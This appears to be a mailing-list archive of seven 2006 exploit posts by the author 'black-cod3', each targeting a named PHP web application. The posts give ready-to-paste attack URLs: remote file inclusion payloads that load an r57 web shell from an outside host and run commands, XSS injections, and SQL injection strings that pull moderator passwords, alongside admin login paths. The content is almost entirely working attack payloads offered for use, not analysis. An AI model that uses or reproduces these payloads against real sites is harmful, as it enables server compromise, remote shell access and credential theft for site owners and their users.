from:"black\-cod3"

multiple file inclusion exploits in ovidentia v5.8.0

2006-06-01 Thread black-cod3

multiple file inclusion exploits in ovidentia v5.8.0


forum type : ovidentia v5.8.0

bug found by : black-code&sweet-devil

team : site-down

type : file include 




exploits :



http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/topman.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/approb.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/vacadmb.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/vacadma.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/vacadm.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/statart.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/search.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/posts.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/options.php?babInstallPath=http://Yoursite.com/r57.txt?




And more pages are vulnerabe in the directory  /ovidentia/ with the same 
variable, 


as an example :


login.php


frchart.php


flbchart.php


fileman.php


faq.php


event.php


directory.php


articles.php


artedit.php


approb.php


calday.php



And more .. ;)









###

emails: 


[EMAIL PROTECTED]  &  [EMAIL PROTECTED]

###



All my respect to our friends , lezr.com , g123g.net 



done .. peace

Xss exploit in Photoalbum B&W v1.3

2006-05-29 Thread black-cod3

Xss exploit in Photoalbum B&W v1.3


forum type : Photoalbum B&W v1.3

bug found by : black-code & sweet-devil

team : site-down

type : Xss




exploit :



http://www.example.com/superalbum/index.php?pic='>alert(10)





path to admin login:


###

emails: 


[EMAIL PROTECTED]  &  [EMAIL PROTECTED]

###



All my respect to our friends , lezr.com , g123g.net 



done .. peace

multiple file include exploits in EzUpload Pro v2.10

2006-05-29 Thread black-cod3

multiple file include exploits in EzUpload Pro v2.10 


forum type : EzUpload Pro v2.10 

bug found by : black-code & sweet-devil

team : site-down

type : file include 




exploits :



form.php


http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd


customize.php


http://www.example.com/arab3upload/customize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd


initialize.php


http://www.example.com/arab3upload/initialize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd





path to admin login:


###

emails: 


[EMAIL PROTECTED]  &  [EMAIL PROTECTED]

###



All my respect to our friends , lezr.com , g123g.net 



done .. peace

sql injection in PHPcafe.net Tutorial Manager

2006-05-27 Thread black-cod3

sql injection in PHPcafe.net Tutorial Manager v1.0 Beta 2 


forum type : PHPcafe.net Tutorial Manager v1.0 Beta 2

bug found by : black-code&sweet-devil

team : site-down

type : Sql injection


code:


http://www.xxx.com/path/index.php?lang=0&CODE=1&id=[sql]



path to admin login:


http://www.xxx.com/pth/admin


All my respect to my friend sweet-devil , lezr.com , g123g.net ..


done .. peace

Multiple Xss exploits in ar-blog v 5.2

2006-05-27 Thread black-cod3

Multiple Xss exploits in ar-blog v 5.2


forum type : ar-blog v 5.2

bug found by : black-code

team : site-down

type : Xss


black-code:


http://www.xxx.com/path/index.php?page=gb&count=next='>alert(10)


http://www.xxx.com/path/index.php?page=gb&count='>alert(10)


http://www.xxx.com/path/index.php?page=showtopis&month=mo&year=Year_the_news='>alert(10)


http://www.xxx.com/path/index.php?page=showtopis&month=mo&year='>alert(10)


http://www.xxx.com/path/index.php?page=showtopis&month=mo='>alert(10)


http://www.xxx.com/path/index.php?page=showtopis&month='>alert(10)




path to admin login:


http://www.xxx.com/pth/admin


All my respect to my friend sweet-devil , lezr.com , g123g.net ..


done .. peace

Xss exploit in Chipmunk guestbook

2006-05-27 Thread black-cod3

Xss exploit in Chipmunk guestbook



forum type : Chipmunk guestbook 

bug found by : black-code

team : site-down

type : Xss


black-code:


codes :


http://www.xxx.com/scambi/index.php?start='>alert(10)




path to admin login:


http://www.xxx.com/path/admin


All my respect to my friend sweet-devil , lezr.com , g123g.net ..


done .. peace

Critical sql injection in saphplesson 2.0

2006-05-27 Thread black-cod3

Critical sql injection in : 


forum type : saphplesson 2.0

bug found by : black-code&sweet-devil

team : site-down

type : sql injection


black-code:


http://www.xxx.net/sh3r/add.php?forumid=-1%20union%20select%20Modpassword%20from%20modretor


sweet-devil:


http://www.xxx.net/lesons/show.php?lessid=1%20union%20select%20null,null,null,ModName,ModPassword,ModPassword,ModPassword%20FROM%20modretor



path to admin login:


http://www.xxx.com/pth/admin


All my respect to my friend sweet-devil , lezr.com , g123g.net ..


done .. peace

multiple file inclusion exploits in ovidentia v5.8.0

Xss exploit in Photoalbum B&W v1.3

multiple file include exploits in EzUpload Pro v2.10

sql injection in PHPcafe.net Tutorial Manager

Multiple Xss exploits in ar-blog v 5.2

Xss exploit in Chipmunk guestbook

Critical sql injection in saphplesson 2.0

7 matches

Site Navigation

Mail list logo

Footer information